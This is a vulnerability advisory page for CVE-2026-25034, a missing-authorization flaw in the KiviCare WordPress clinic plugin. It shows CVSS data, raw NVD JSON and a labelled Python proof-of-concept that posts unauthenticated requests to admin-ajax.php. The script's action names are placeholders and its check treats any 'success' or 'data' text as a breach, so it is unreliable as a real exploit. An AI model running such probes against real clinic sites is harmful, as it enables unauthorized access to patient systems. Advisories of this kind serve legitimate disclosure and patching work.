Security Vulnerability Report
中文
CVE-2026-25034 CVSS 6.5 MEDIUM

CVE-2026-25034

Published: 2026-03-25 17:16:43
Last Modified: 2026-04-28 02:16:04

Description

Missing Authorization vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects KiviCare: from n/a through <= 3.6.16.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KiviCare <= 3.6.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit Title: KiviCare < 3.6.17 - Missing Authorization PoC # Description: This script demonstrates checking for the missing authorization vulnerability. # Note: Replace 'TARGET_URL' and 'VULNERABLE_ENDPOINT' with actual values. target_url = "http://TARGET_URL/wp-admin/admin-ajax.php" # Common vulnerable action parameter for KiviCare (example based on typical plugin structure) payload = { "action": "kivicare_generic_action", # Replace with actual vulnerable action "route": "vulnerable_endpoint" # Replace with actual route } try: response = requests.post(target_url, data=payload, timeout=10) if response.status_code == 200: # Analyze response to confirm unauthorized access if "success" in response.text or "data" in response.text: print("[+] Potential vulnerability confirmed! Unauthorized data accessed.") print("Response:", response.text[:200]) else: print("[-] Request sent but no sensitive data exposed.") else: print("[-] Target returned status code:", response.status_code) except Exception as e: print(f"Error connecting to target: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25034", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:43.237", "lastModified": "2026-04-28T02:16:03.687", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Iqonic Design KiviCare kivicare-clinic-management-system allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects KiviCare: from n/a through <= 3.6.16."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Iqonic Design KiviCare kivicare-clinic-management-system permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a KiviCare: desde n/a hasta &lt;= 3.6.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/kivicare-clinic-management-system/vulnerability/wordpress-kivicare-plugin-3-6-16-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}